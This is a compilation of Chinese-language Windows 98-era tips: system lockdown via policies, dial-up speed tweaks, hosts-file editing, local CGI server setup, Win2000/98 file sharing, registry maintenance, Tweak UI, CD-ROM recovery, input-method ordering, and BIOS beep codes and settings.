    4．在BIOS里将Boot up设为“c:，a:”方式（即不允许从软盘和CDRom启动）。现在用“超级用户”登录，打开“超级兔子魔法设置”软件，在“魔法设置”的“电脑启动”中分别设置“不允许新旧版本的DOS双重启动”、“禁止F4按键”、“禁止启动时警告”、“禁止进入安全模式”。这样可以防止别人用DOS方式更改系统设置。
    5．在“安全与其他”中设为“禁止属性菜单”和“禁止任务栏上属性菜单”，这样可以进一步防止其他人通过鼠标右键菜单的“资源管理器”等进行系统文件操作。
    6．在“右键菜单”中将“目录”、“文件夹”、“驱动器”、“所有文件”等中所有的可以打开资源管理器或者类似程序的关联都删除，如“资源管理器”、“Browse with ACDSee”、“查找”、“WinZip”等，这一步很重要，当然你也可以用其它软件设置鼠标右键菜单或者干脆禁用右键。
    7．在“开始菜单”的“禁止显示开始菜单”中选定“设置”。这样其他用户将无法进入“控制面板”等，而超级用户可以通过“资源管理器”或“我的电脑”进入。
    8．重新启动后，按“取消”键登录并进入“附件”中的“系统策略编辑器”，在“文件”中选择“打开注册表”，此时出现“本地用户”和“本地计算机”，双击“本地用户”，然后把能限制的都限制上（即在选项前打上钩），按“确定”，选择“文件”中的“保存”，你会发现匿名用户已经没有任何事情可做了。
    9．用“一般用户（学生）”登录，然后方法同第8步，但请注意：不要在“在‘我的电脑’中隐藏驱动器”、“禁用‘关闭系统’命令”、“退出时不保存设置”和“只能运行允许的Windows应用程序”前打上钩（即对此几项不作限制）。
    10．用“授权用户（老师）”登录，后续方法同第9步。
    11．重新启动，用“超级用户”登录，打开资源管理器，进入C:\Windows\Profiles目录，里面有三个用户的“开始菜单”等的备份。有选择地删掉“授权用户（老师）”和“一般用户（学生）”的“Start Menu”中的“资源管理器”、“MS－DOS方式”、“附件的系统工具”等有可能对系统文件进行操作的软件。这样便大功告成了！
    经过上述设置，系统的安全性不会比NT差多少。当然，最好还是用GHost做一个系统备份，这样即使重装系统也不用再做这么繁琐的设置了！
    如果大家有什么问题，请给我来信，我的E－mail: cnglobe@263.net。


让Windows 98快速登录互联网

《一键清理系统垃圾》

让Windows 98快速登录互联网

2001-10-31· ·垂天翼··yesky

1 2　下一页

    许多朋友在登录互联网时经常遇到从拨号到连接成功时间太长的情况，有时竟然需要两三钟。那么如何提高Windows 98登录互联网的速度呢？方法有许多种，下面让我们一道来进行尝试。

    一、 删除VPN支持

    Windows 98网络登录速度慢的原因之一，是由于Windows 98缺省安装了虚拟专用网络（VPN）的缘故。虽然VPN可用于通过Internet或LAN安全访问企业网，但对于普通用户来说却没有什么实际意义，可以考虑将VPN删除。其方法是：单击“开始\设置\控制面板\网络”，在“配置”选项卡下，把“已经安装了下列网络组件”列表框中的“拨号网络适配器#2（VPN）”和“TCP/IP→拨号网络适配器#2（VPN）”两项删除即可。

    二、 修改主网络登录方式

    在安装Wndows98时，系统自动采用了“Microsoft友好登录”的主网络登录方式，这也是造成它拨号速度特别慢的原因之一，而将其改为“Microsoft网络用户”的登录方式，将会使网络登录速度显著加快。其方法为：在“主网络登录”选项中直接选取“Microsoft网络用户”。如果没有这种登录方式，可先单击“添加…”按钮，选择“客户”组件，并选择“Microsoft网络用户”，然后单击“确定”。

    三、 修改系统的登录设置

    在默认情况下，Wndows98的“拨号网络”连接采用“登录网络”（这将迫使“拨号网络”服务寻找Microsoft Windows网络，如果找不到，连接就会超时），并将NetBEUI、IPX／SPX以及TCP／IP协议都绑定到拨号适配器上（而大多数ISP连接到Internet都只要求TCP/IP协议），这也是造成拨号速度特别慢的原因之一。其修改方法是：单击菜单“开始\程序\附件\通讯\拨号网络”，用鼠标右击你连接Internet时所使用的连接名称，选“属性”，在“服务器类型”选项卡的“高级选项”中取消“登录网络”选择框中的“√”，在“所允许的网络协议”中只选择“TCP／IP”，然后点击“确定”按钮。

    四、 设置连接属性

    启动浏览器，在弹出的“拨号连接”窗口中选择所要使用的连接名称，并填好用户名和密码，然后选择“保存密码”和“自动连接”两项，这样就可免去每次连接前重复的输入和确认过程，加快网络登录速度。

    五、 取消拨号前的安全性检查

    在建立拨号连接之前，系统默认地检查在计算机上有无共享文件夹。如有则关闭共享特性，以防止Internet上的其他用户访问该计算机上的文件夹。如果确信计算机上没有共享文件夹，则可以关闭该功能。其方法是：单击“开始\设置\控制面板\Internet\连接”，然后取消“在拨号前进行系统安全性检查”复选框即可。

让Windows 98快速登录互联网

2001-10-31· ·垂天翼··yesky

上一页　1 2

    六、 提高计算机与Modem的连接速度

    其方法是：单击“开始\设置\控制面板\调制解调器\常规”，选取已安装的Modem并单击“属性”按钮，然后在“常规”选项卡中，选取“最快速度”列表框中的最高值“115200”，但不要选中下面的“仅以该速度连接”选项。接着选择“连接”选项卡，将“数据位”设置为“8”，“奇偶校验”设置为“无”，“停止位”设置为“1”，并取消“拨号之前等待拨号音”选项。

    七、 修改Modem的端口设置

    同样在上述对话框中，选取“连接”选项卡，并单击“端口设置…”按钮，确定选中“使用FIFO（先进先出）缓冲区”，然后分别将“接收缓冲区”“传输缓冲区”的滑块滑到最高。

    八、 修改系统端口的波特率值

    端口的波特率值设定得太小会导致通信缓慢从而降低上网速度，这时可以修改，其修改方法是：单击“开始\设置\控制面板\系统\设备管理器”，双击“端口（COM＆LPL），并选取Modem所使用的通讯端口（比如COM1）”，单击“端口设置”选项卡，将“波特率”选为最大值“921600”，将“流量控制”选为“硬件”，然后再单击“高级…”按钮并分别将“接收缓冲区”和“传输缓冲区”设为最高。另外，如果Modem使用的是COM3或COM4端口，则需要打开系统配置文件Win.ini进行设置。其方法是：使用“记事本”打开Windows文件夹下的Win.ini，找到.[Ports]节，将COM3：（或COM4：）=9600，n，8，l，x修改为115200，n，8，l，p。其中，最后一个参数为“x”代表软件流控制，为“p”代表硬件流控制，为“”（空白）则代表无流控制。

    九、 增加COM缓冲区容量

    使用“记事本”程序打开Windows文件夹下的系统文件System．ini，在其中的[386Enh]节中加入如下一行：COM2Buffer=1024（假设Modem接在COM2端口上），以增加串行口的传输缓冲区大小。

    十、 编辑hosts文件

    hosts是一个TCP／IP协议所使用的IP地址到网络主机名的映像文件，文件中的每一行文本代表一个映像。用“记事本”新建一个文件（或直接把C：\Windows\Hosts．sam改名为hosts，然后进行编辑），把你经常访问的站点的IP地址和主机名加进去，格式是：IP地址十空格十主机名，如果有注释，则以“＃”开头，如：61.132.187.134 sina.com.cn＃169新浪网。然后把该文件保存为hosts（注意：保存时文件名一定要加双引号，否则将保存为hosts．txt文件）。这样，当下次再访问hosts文件中已有映像的站点时，浏览器会直接从本机hosts文件中取出IP地址，省略了通过通信线路去域名服务器查询IP地址的过程，从而加快了连接速度。另外，你也可以在上述IP地址后只键入一个字符，比如“x”，这样，在你的机器里，新浪网的网址就变成了“x”，只需键入一个“x”，就可快速直达61.132.187.134，真正是又方便又快捷。


如何在Win95/98/NT上调试CGI程序

《一键清理系统垃圾》

如何在Win95/98/NT上调试CGI程序

方法一——傻瓜型

    安装sambar4.3。

    安装简单，无需任何设置即可使用，但对某些perl函数的支持稍差。sambar4.3是一个小型服务器软件，自带perl 5，支持ssi，无需安装perl for win32。安装后把cgi文件拷到/sambar/cgi-bin/目录，并把文件名改为*.pl（sambar只执行以pl结尾的cgi脚本），主页文件拷到/sambar/docs/目录，在浏览器输入你的http://主机名或http://127.0.0.1/的域名就可调用/sambar/docs目录下主页文件，输入http://主机名/cgi-bin/*.pl就可调用/sambar/cgi-bin/目录下的cgi脚本。

    方法二——进阶型

    安装perl for win32（Activeperl 5.00518），然后安装omnihttpd 2.05，支持cgi程度较好。

    Omnihttpd也是一个微型服务器软件，同样支持perl 5，ssi，win-cgi。把主页文件拷到httpd/htdocs目录，cgi脚本拷到httpd/cgi-bin目录即可通过浏览器调用，注意：有些网友有一个误区，认为安装了perl for win32就可在windows上通过双击文件运行，这是不对的，因为是脚本文件，故只能在浏览器调用，这也是为何要装服务器软件的原因。

    方法三——能手型

    1.安装IIS4.0（win98为PWS4.0，winnt为IIS4.0）服务器；

    2.安装perl for win32（Activeperl 5.00518）。

    支持cgi程度较好，但不支持使用如wwwbbs 3.0这类用UNIX进程和函数编制的CGI程序。虚拟根目录为c:/inetpub/wwwroot/，把c:/inetpub/wwwroot/cgi-bin目录设置为可执行该种配置的不但支持cgi，另外还完全支持ASP哦！

    如果你选择了第2或第3种方案，但还不能调试cgi，则还得对注册表动一下手脚——运行regedit找到HKEY_LOCAL_MACHINE\System\Currentcontrlset\-Services\W3svc\Parameters\ScriptMap\目录，增加键名“.cgi”、键值“C:\PERL\BIN\perl.exe %s %s”，重新开机，一切OK！

    方法四——高手型

    1.安装Apache 1.3.6服务器；

    2.安装perl for win32（Activeperl 5.00518）。

    支持cgi程度：最好，不过有的Sambar可以编译的CGI，它却不能。

    注有事项

    1.装好后，在Apache下有一个CONF目录，里面有个HTTPD.CONF文件，必须要先设置好它们才能启动CGI。

    （1）寻找ServerAdmin，把后面的EMAIL改为你自已的EMAIL，这个改不改不是很重要。

    （2）寻找ServerName，把前面的#号去掉，后面改为你的域名。

    （3）寻找 ，往下面有一句Options，把后面的参数全去掉，加一个All，注意大小写。再往下有一句AllowOver ride，也把后面的None去掉，加一个All。

    （4）寻找 ，往下面第八行有一句Options，把后面的参数全去掉，加一个All，注意大小写。再往下数行有一句Allow Override，也把后面的None去掉，加一个All。

    （5）寻找#ScriptAlias /cgi-bin/ "C:/Apache/cgi-bin/"，把前面的#号去掉。

    （6）寻找 ，下面有一句AllowOverride，把后面的参数去掉，加一个All，注意大小写。再往下有一句Options也把后面的None去掉，加一个All。

    （7）寻找AddHandler cgi-script .cgi后面加上.pl，即AddHandler cgi-script .cgi .pl。

    （8）如果增加SSI，需把下面两行前面的#号去掉：

    AddType text/html .shtml

    AddHandler server-parsed .shtml

    （9）还要注意perl脚本中的perl解释路径，应改为: #!c:/perl/bin/perl5.00518使用perl5或#!c:/perl/bin/perl（使用perl4）

        2.第1、2、4种方案的绝对路径均可用相对的形式表示，如: "../cgi-bin/ "，但第3种则必须用完整的硬盘路径表示，如:" C:/Inetput/wwwroot/cgi-bin/ "

返回


实现Win 2000与Win 98的对等连接

《一键清理系统垃圾》

实现Win 2000与Win 98的对等连接

    1.首先分别在需要对等连接的计算机上安装网卡及其驱动程序，实现计算机之间的硬件连接。
    2.其次，安装网络协议和设置IP地址。在Win 98里的设置在这里就不赘述了，在Win 2000中关于对等网的设置，具体做法是：单击开始选单的“设置”,单击“网络和拨号连接”打开网络和拨号窗口。双击本地连接图标，单击“属性”按钮，在本地连接属性窗口中选“安装”，在安装网络组件类型窗口中添加Microsoft Networks客户端、Microsoft Networks的文件和打印机共享、NetBEUI Protocol、 Internet协议(TCP/IP)，安装完成后选本地连接属性窗口中的“Internet协议(TCP/IP)”，单击“属性”按钮，选“使用下面的IP地址”，在IP地址框中填入192.168.0.88(注：此IP地址应和安装Win 98的机器中的IP地址属同一类网络地址),子网掩码中填255.255.255.0，单击“确定”完成设置。

    3.选网络和拨号连接窗口中的高级选单下的“网络标识”子选单，单击“属性”按钮，在标识更改窗口中设置工作组和计算机名。

    4.重新启动计算机，单击Win 2000桌面上的网上邻居图标，再打开邻近的计算机图标，你就可以看到和本计算机相连接的所有Win 98计算机。这时你可以从Win 2000中访问其他的计算机，但却不能从Win 98中访问Win 2000计算机，问题的关键在于Win 2000不允许其他的计算机通过计算机名来访问它，你必须在Win 2000中为每一个使用Win 98的计算机添加一个用户。

    5.打开控制面板，双击用户和密码图标，在用户和密码窗口中添加从Win 98登录到Win 2000的用户，并设置密码和相应的权限。

    6.单击桌面上我的电脑图标，用鼠标右键单击C：，点共享，新建一共享（可以为不同用户设定共享Win 2000中不同的资源），单击“确定”，将两台计算机重新启动一下即可。

返回


实现Windows 98与2000的共享

《一键清理系统垃圾》

实现Windows 98与2000的共享

《中国电脑教育报》段秀明

    我校原有一批配置较低的计算机，用的是Windows 98操作系统，最近新进了一批配置较高的计算机，安装了Windows 2000操作系统。在网络连通后，却出现了如下的问题，在网上邻居中，所有安装了Windows 2000操作系统的计算机都不能被访问，但能够看到Windows 2000的共享机器名，访问其资源时，弹出来一个让填写访问密码的对话框，事实上，任何一台机器都没有设置共享密码。这个小问题让我冥思苦想，最后终于发现在Windows 2000安装后，系统默认的状态是“账户已停用”。重新启用它即可解决问题：在Windows 2000中选择“我的电脑→控制面板→管理工具→计算机管理→用户和组→用户”，右键单击“用户”，选择“属性”选项，属性中有一项供来宾访问的“账户已停用”的复选项中有个对勾，去掉这个对勾，大功告成！


维护好Windows 98的注册表

《一键清理系统垃圾》

维护好Windows 98的注册表

    注册表是Windows 98的一个核心组成部分，一旦系统被破坏而需要进行恢复时，首先就得考虑恢复它。下面笔者结合自己的实际经验，介绍一下它的维护。
    一、备份注册表
    一般说来，当Windows 98安装好后，会在启动时自动运行Scanregw．exe／autorun，目的是每天启动时备份一次注册表。你可以从开始选单上运行“Msconfig”，运行Microsoft的系统配置程序，点“启动”选项卡，查看该命令是否运行。倘若该命令没有被运行，你可以运行注册表编辑器“Regedit”，在“\HKEY—LOCAL—MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”主键下新建一个字符串值，将键值设置为“C：\windows\scanregw．exe／autorun”（假设Windows98安装目录为C：\windows）。这样，Windows 98就会自动备份最近五天的注册表，以rb00？．cab形式存放在C：\windows\sysbckup\路径下。有些人为了提高Windows 98的启动速度，可能屏蔽了这个功能，但笔者建议还是有空时手动运行一下“Scanregw．exe”，以维护注册表。
    二、修复注册表
    当Windows 98注册表出现问题时，往往已不能进入Windows界面了，这时你可以试试在DOS下进行修复操作。Windows 98提供了可在DOS下维护注册表的Scanreg．exe命令（位于Windows目录下），它比较常用的参数有：
    1.Backup：备份注册表和相关的系统文件；
    2.Restore：从备份的注册表中选择一个来恢复；
    3.Fix：修复注册表的错误。
    你也可以不加参数运行它，会出现一个DOS下的图形界面，让你选择是备份还是恢复注册表，然后，有程序向导指引你把工作完成。如：Windows 98报告注册表损坏，不能进入图形界面，那就先试着在DOS方式下运行Scanreg／fix，看看系统是否能修复注册表。成功与否，Scanreg都会告诉你结果。如果注册表损坏严重，就只能从备份中恢复了。运行Scanreg／Restore后，程序会自动找到注册表的备份，如果不止一个的话，它会提示让你选择其中之一，你可以根据每个备份的创建日期来判断恢复哪一个。一般说来，备份日期越新的越和当前系统相匹配，也越好。恢复成功后，系统会提示重新启动，如果你的Windows 98的其它部分没有损坏或损坏很少，通过这种方法，能基本解决问题，免得再走烦人耗时的重装系统之路。
    注意：每天运行一次Scanregw来备份注册表也没必要，关键是在系统的软配置改变之前进行备份。比如，强制执行硬盘的DMA功能，安装最新的防火墙等。还有就是不要怕备份太多占了硬盘空间，Windows 98只会自动保留最新的五个备份，其余的都会被删掉。


用Tweak UI设置Win98

《一键清理系统垃圾》

用Tweak UI设置Win98

    Tweak UI是随Win98安装光盘附送的系统设置程序，使用它可以完成一些只有通过修改注册表才能设置的功能，从而避免了修改注册表失败的危险。
    Tweak UI存放于Win98安装光盘的tools\reskit\powertoy目录中，安装时需要通过“控制面板\添加删除程序\windows安装程序”进行，点击“从磁盘安装”，选中Win98光盘中tools\reskit\powertoy目录中的tweakui.inf文件，点两次“确定”，再选中Tweak UI，单击“安装”即可。安装完成后的Tweak UI是存放在控制面板里，你可以双击打开它。
    Tweak UI有十三项设置，分别是Mouse、General、Explorer、IE4、Desktop、My Computer、Control Panel、Network、New、Add／Remove、Boot、Repair、Paranoia，下面举几个实例来简单说明它的使用。
    1.鼠标自动激活当前窗口
    当你同时打开几个窗口，只要鼠标移到哪个窗口上，哪个窗口便自动激活。打开Tweak UI，切换到Mouse选项，选中activeation follows mouse（X－Mouse），点击“应用”即可。
    2.隐藏“我的电脑”中的驱动器及控制面板中的图标
    打开Tweak UI\My Computer选项，把盘符前的复选框中的对号去掉，即可把该盘隐藏。同样方法，点击“Contorl Panel”选项卡，下面的选框中列出了控制面板中的图标，可以通过取消前面的复选框隐藏控制面板中对应的图标，把几个重要图标隐藏起来，对于系统安全还是很有必要的。
    3.定制桌面系统图标
    系统图标是指系统内部带的图标，例如我的电脑、回收站等。其实这都是可以定制的，打开Tweak UI\Desktop选项卡，下面选框中列出的选项对应着桌面上的图标，按自己的意愿选中后，单击应用就会在桌面上显示相应的图标。
    此外，Tweak UI中常用的还有Boot，用它可以来设定Win98启动时是否出现菜单，菜单的等待时间；add／Remove可用来添加删除程序，功能等同于控制面板中的添加删除程序；New添加或删除右键\新建\…（或文件\新建\…）菜单中的程序文件名；Repair可用来修复系统及系统图标；Paranoia可用来清除历史记录及浏览器记录以及定义自动播放CD等等。


在Windows 98中建立自己的字符库

《一键清理系统垃圾》

在Windows 98中建立自己的字符库

    在Windows 98中进行文字和数据处理时常会遇到一些生僻汉字或特殊符号无法处理，这时可用系统中的“造字程序”来完成。而当重新安装系统之后或想要把自己已经造好的字符库移植到其它计算机上的时候还需要重新造字。对此，笔者经过探索，找到了一个建立自己的字符库的方法，并且具有良好的通用性。
    一、原理：Windows 98中的“造字程序”将造好的字符存放在系统的安装目录下的“EUDC.TTE”和“EUDC.EUF”文件中，并在注册表的相关项中作上记录。
    二、方法：将造好的字符保存后（区位码从“AAA1”开始记录用户自定义的字符），并将“EUDC.TTE”和“EUDC.EUF”备份到磁盘上，然后打开“注册表编辑器”，找到“HKEY_CURRENT_USER\EUDC”和“HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CodePage\EUDCCodeRange”分支，并将这两项导出保存为后缀名为“.reg”的注册表文件，与上述两个文件保存在同一目录。
    三、恢复／移植：只需要将“EUDC.TTE”和“EUDC.EUF”，复制到目标磁盘的系统目录下，并导入两个注册表文件即可。这样，你就可以顺利地恢复或移植自己的字符库了。
    （编者注：创建自己的字符库时，需要有系统的“造字程序”和“字符映射表”组件，这可以通过“控制面板→添加／删除程序→Windows安装程序”来加入这两个组件。先在“造字程序”中将你所创造的字符链接到相应的字体文件，然后才能通过“字符映射表”调用。）


找回Win98下丢失的光驱

《一键清理系统垃圾》

找回Win98下丢失的光驱

经常使用计算机的朋友可能会遇到在Win98中，光驱盘符有时莫名其妙地丢失的现象。在多次处理这类问题的过程中，笔者总结出光驱丢失的几个原因及其相应的解决方法，希望能对广大电脑使用者有所帮助。
    一、硬件故障或冲突
    使得系统启动时没有检测到CD-ROM这种硬件设备。其表现特征是在Win98图形界面出现以前，系统检测到的硬件设备中没有CD-ROM。这种光驱“丢失”现象一般都发生在使用者开机箱拔插硬件设备或设置CMOS等操作之后。因此找回光驱的办法是先按下面的顺序针对硬件进行检查：
    1.若光驱接在第二IDE口，应检查CMOS中的第二IDE口是否打开。因为有的主板可手工关闭第二IDE口。
    2.检查光驱数据线、电源线连接是否牢靠。
    3.光驱的跳线设置是否正确，这主要是针对新安装的第二个光驱或由两个光驱改为一个的情况。
    4.光驱的数据线及其使用的IDE口是否损坏。笔者就曾遇到过第二IDE口损坏，造成光驱丢失的情况。检查过程中可采取与硬盘互换IDE接口、互换数据线及与硬盘挂接在同一个IDE口等方法，来查看开机时系统能否检测到CD-ROM。经过以上4项检查后，加电重启机器，系统均可检测到CD-ROM设备（若仍检测不到，则应考虑光驱已坏）。
    二、光驱驱动程序不兼容
    这种光驱丢失发生在安装显卡等设备驱动程序或升级主板驱动程序并重新启动Win98之后。此时若检查Win98“控制面板”内“系统属性”中的“设备管理器”，在“硬盘控制器”中会有带黄色惊叹号的设备显示。而“控制面板”的“系统属性”中的“性能”一项则表明计算机工作在MS-DOS兼容方式。针对这种故障原因，可采用以下两种方法解决：
    1.删除“系统属性”内“设备管理器”中“硬盘控制器”的所有设备，然后重新启动机器。
    2.重新安装正常使用时的主板驱动程序，然后重新启动机器，一般就能找回光驱（如这两种方法只是使“设备管理器”和“性能”项恢复正常，光驱仍无法使用的话，请用下面第四种原因的解决方法）。
    三、计算机感染了某些病毒
    这种由于病毒造成的故障的突出特征是没有安装任何设备的驱动程序，但是“控制面板”内“系统属性”中的“性能”一项表明计算机工作在MS-DOS兼容方式，此时利用杀毒软件进行杀毒处理，重新启动后可找回光驱（关于计算机工作在MS-DOS兼容方式的原因也可能是由于系统启动时加载了实模式的DOS程序造成的，但这种情况一般不会使光驱丢失）。
    四、由于某些意外情况
    如可能是误删除光驱设备、系统死机重启等造成光驱丢失。可尝试用下面的方法进行恢复：
    1.编辑CONFIG.SYS和AUTOEXEC.BAT文件。若存在被Win98禁用的CD-ROM驱动程序，请手工打开，否则手工加载光驱的DOS驱动程序，然后重启机器。
    2.用CD-ROM安装盘在Win98的MS-DOS方式下安装CD-ROM驱动，重启机器。在系统找回光驱后，再手工编辑CONFIG.SYS和AUTOEXEC.BAT文件，禁用CD-ROM的DOS驱动程序，系统即可恢复正常。
    通过使用以上几种方法，可成功找回Win98中丢失的光驱盘符。上述方法也适用于Win97或Win95。


重排Windows 98 汉字输入法

《一键清理系统垃圾》

返回总目录 上一页 目录页

重排Windows 98 汉字输入法

   在Windows 95／98中，假如你已安装了多种汉字输入法，那么有没有碰到要连续按多次输入法切换键，才能找到所需输入法的情况?有没有办法能快速切换到所需的输入法?第一种方法就是重新安装汉字输入法，将最常用的输入法排在输入法列表的最前头。因为Win 95／98本身并不提供汉字输入法顺序的调整方法。第二种方法是通过修改注册表来调整输入法的顺序、增加或删除输入法，甚至可做到Windows 95／98启动后的缺省输入法为汉字而不是英文。

    通过对注册表的分析，可以发现在HKEY_LOCAL-_MACHINE\SYSTEM\CurrentControlSet-\Control\keyboard layout\下存放着各输入法对应的主键，如下所示：
                                   主键　　　 输入法
                                 E00E0804　 微软拼音输入法
                                 E00C0804　 表形码输入法
                                 E0050804　 区位码输入法
                                 E0040804　 智能ABC输入法
                                 E0030804　 郑码输入法
                                 E0020804　 双拼输入法
                                 E0010804　 全拼输入法
                                 00000409　 英文输入法

    在HKEY_USERS\.DEFAULT\keyboard layout\preload\下则是系统所安装的输入法的主键及键值，其主键为自然数，键值为上表中各输入法对应的主键。例如系统已安装了“智能ABC”和“全拼”输入法，则可看到如下的主键和键值：
                                  主键　　　　 键值
                                   1　　　　 00000409
                                   2　　　　 E0040804
                                   3　　　　 E0010804

    改变输入法顺序

    假设要将输入法顺序变为“全拼”、“智能ABC”和“英文”，可将主键和键值更改如下：
                                  主键　　　　　键值
                                   1　　　　　E0010804
                                   2　　　　　E0040804
                                   3　　　　　00000409
   增加输入法

   例如要增加“区位码”输入法，可在注册表种增加主键4和键值E0050804。

    删除输入法

    例如要删除“智能ABC”输入法，直接删除主键2即可。

    值得注意的是对注册表的上述修改要重新启动系统才有效。


98

《一键清理系统垃圾》

返回总目录

98

◎Novell 4.11无盘Win95/98安装捷径
◎Novell局中装Windows 98
◎Win98+Win2000+WinXP三操作系统共同使用安装实录
◎WIN98高级设置技巧几则
◎1．All Users文件夹
◎Win98无法正常关闭的解决方法
◎Win98下闪存盘常见故障
◎WIN98注册表编辑器的常用操作
◎windows98se 不能关机的原因及解决方法
◎Windows98安全防范基础教程
◎Windows98的小技巧
◎Windows98的优化
◎WINDOWS 98 奇 招 酷 集！！
◎Windows 98的秘密武器（二）
◎Windows 98的秘密武器（三）
◎Windows 98的秘密武器（一）
◎Windows 98下巧妙隐藏硬盘一法
◎给Win98装上“飞毛腿”
◎关于98的优化
◎加快Windows 98重启的7种方法
◎解决VXD导WIN98内存“丢失”问题
◎Windows98不能正常关机解决法
◎解决Windows 98无法正常关机的技巧
◎介绍Windows 98中几个实用的系统工具
◎紧急恢复Windows98/2000双启动
◎经典故障：Windows 98常见故障排除方法
◎快速清除Windows 98下的Folder.htt病毒
◎快速重启Windows 98
◎快速重装Win 98三法
◎让Win98拥有NT的安全性
◎让Windows 98快速登录互联网
◎如何在Win95/98/NT上调试CGI程序
◎实现Win 2000与Win 98的对等连接
◎实现Windows 98与2000的共享
◎维护好Windows 98的注册表
◎用Tweak UI设置Win98
◎在Windows 98中建立自己的字符库
◎找回Win98下丢失的光驱
◎重排Windows 98 汉字输入法

www.163164.com 下载:《一键清理系统垃圾》程序，保持系统的“苗条”身材与运行速度！

返回总目录


AMI BIOS 自检响铃含义

《一键清理系统垃圾》

返回总目录 目录页 下一页

AMI BIOS 自检响铃含义

报警声数　　　错误含义

1短　　　　内存刷新失败，主板上的内存刷新电路故障，更换内存条

2短　　　　奇偶校验错误，第一个64KB内存芯片出现奇偶校验故障，在CMOS设置中将内存ECC校验的选项设为DISABLED就可以解决，但最好是更换内存条

3短　　　　基本64KB内存失败，内存芯片检查失败，更换内存

4短　　　　时钟出错，主板上的TIMER定时器不工作

5短　　　　CPU故障，主板上的CPU产生故障

6短　　　　A20门故障，键盘控制器中包含A20门开关故障

7短　　　　CPU例外中断错误，主板上的CPU产生一个例外中断，不能切换到保护模式

8短　　　　显示内存错误，显示卡上无显示内存或显示内存错误，更换显卡或显存

9短　　　　ROM检查失败，ROM校验值和BIOS中记录值不一样

10短　　　 CMOS寄存器读/写错误，CMOS RAM中的SHUTDOWN寄存器故障

11短　　　 CACHE错误/外部CHCHE损坏，表示外部CACHE故障

1长3短　　内存错误，内存损坏，更换

1长8短　　显示测试错误，显示器数据线没插好或显卡没插牢


Award BIOS 自检响铃含义

《一键清理系统垃圾》

Award BIOS 自检响铃含义

报警声数　　错误含义

1短　　　系统启动正常

2短　　　常规错误，请设置CMOS参数，重新设置不正确选项

1长2短　 RAM或主板出错，更换内存或主板

1长2短　 显示器或显卡错误

1长3短　 键盘控制错误、检查主板

1长9短　 主板FLASH ROM或EPROM错误，BIOS损坏，更换FLASH ROM

长声不断　内存条未插或损坏，重插或更换内存条

不停的响　电源、显示器未和显示卡连接好，检查一下所有插头

重复短响　电源有问题

黑屏　　　电源有问题


AWARD BIOS设置详解

《一键清理系统垃圾》

AWARD BIOS设置详解

AWARD BIOS是目前应用最为广泛的一种BIOS。本文将详细介绍一下AWARD BIOS中的有关
设置选项的含义和设置方法，在AWARD BIOS的主菜单中主要有以下几个菜单项：

Standard CMOS Setup（标准CMOS设定）：
这个选项可以设置系统日期、时间、IDE设备、软驱A与B、显示系统的类型、错误处理
方法等。
（1）在IDE设备设置中，用户可以在Type（类型）和Mode（模式）项设为Auto，使每次
启动系统时BIOS自动检测硬盘。也可以在主菜单中的IDE HDD Auto Detection操作来设
置。用户还可以使用User选项，手动设定硬盘的参数。必须输入柱面数（Cyls），磁头
数（Heads），写预补偿（Precomp），磁头着陆区（Landz），每柱面扇区数（
Sectorxs），工作模式（Mode）等几种参数。硬盘大小在上述参数设定后自动产生。
（2）显示类型可选EGA/VGA（EGA、VGA、SEGA、SVGA、PGA显示适配卡选用）、CGA40（
CGA显示卡，40列方式）、CGA80（CGA显示卡，80列方式）、MONO（单色显示方式，包
括高分辨率单显卡）等四种，以现在我们使用的计算机来看，绝大多数都属于EGA/VGA
显示类型。
（3）暂停的出错状态选项有：All Errors（BIOS检测到任何错误，系统启动均暂停并
且给出出错提示）、No Errors（BIOS检测到任何错误都不使系统启动暂停）、All
But Keyboard（BIOS检测到除了磁盘之外的错误后使系统启动暂停，磁盘错误暂停）、
All But Disk/Key（BIOS检测到除了键盘或磁盘之外的错误后使系统启动暂停。

BIOS Features Setup（BIOS功能设定）
该项用来设置系统配置选项清单，其中有些选项由主板本身设计确定，有些选项用户可
以进行修改设定，以改善系统的性能。常见选项说明如下：
（1）Virus Warning（病毒警告）：这项功能在外部数据写入硬盘引导区或分配表的时
候，会提出警告。为了避免系统冲突，一般将此功能关闭，置为Disable（关闭）。
（2）CPU Internal Cache（CPU Level 1 catch）：缺省为Enable（开启），它允许系
统使用CPU内部的第一级Cache。486以上档次的CPU内部一般都带有Cache，除非当该项
设为开启时系统工作不正常，此项一般不要轻易改动。该项若置为Disable，将会严重
影响系统的性能。
（3）External Cache（CPU Level 1 catch）：缺省设为Enable，它用来控制主板上的
第二级（L2）Cache。根据主板上是否带有Cache，选择该项的设置。
（4）BIOS Update：开启此功能则允许BIOS升级，如关闭则无法写入BIOS。
（5）Quick Power On Self Test：缺省设置为Enable，该项主要功能为加速系统上电
自测过程，它将跳过一些自测试。使引导过程加快。
（6）Hard Disk Boot From（HDD Sequence SCSI/IDE First）:选择由主盘、从盘或
SCSI硬盘启动。
（7）Boot Sequence：选择机器开电时的启动顺序。有些BIOS将SCSI硬盘也列在其中，
此外比较新的主板还提供了LS 120和ZIP等设备的启动支持，一般BIOS，都有以下四种
启动顺序：C，A（系统将按硬盘，软驱顺序寻找启动盘）；A，C（系统将按软驱，硬盘
顺序寻找启动盘）；CDROM，C，A（系统按CDROM，硬盘，软驱顺序寻找启动盘）；C，
CDROM，A（系统按硬盘，CDROM，软驱顺序寻找启动盘）。
（8）Swap Floppy Drive:（交换软盘驱动器）缺省设定为Disable。当它Disable时，
BIOS把软驱连线扭接端子所接的软盘驱动器当作第一驱动器。当它开启时，BIOS将把软
驱连线对接端子所接的软盘驱动器当作第一驱动器，即在DOS下A盘当作B盘用，B盘当作
A盘用。
（9）Boot Up Floppy Seek：当Enable时，机器启动时BIOS将对软驱进行寻道操作。
（10）Floppy Disk Access Contol：当该项选在R/W状态时，软驱可以读和写，其它状
态只能读。
（11）Boot Up Numlock Strtus:该选项用来设置小键盘的缺省状态。当设置为ON时，
系统启动后，小键盘的缺省为数字状态；设为OFF时，系统启动后，小键盘的状态为箭
头状态。
（12）Boot Up System Speed：该选项用来确定系统启动时的速度为HIGH还是LOW。
（13）Typematic Rate Setting:该项可选Enable和Disable。当置为Enable时，如果按
下键盘上的某个键不放，机器按你重复按下该键对待；当置为Disable时，如果按下键
盘上的某个键不放，机器按键入该键一次对待。
（14）Typematic Rate:如果Typematic Rate Setting选项置为Enable，那么可以用此
选项设定当你按下键盘上的某个键一秒钟，那么相当于按该键6次。该项可选6、8、10
、12、15、20、24、30。
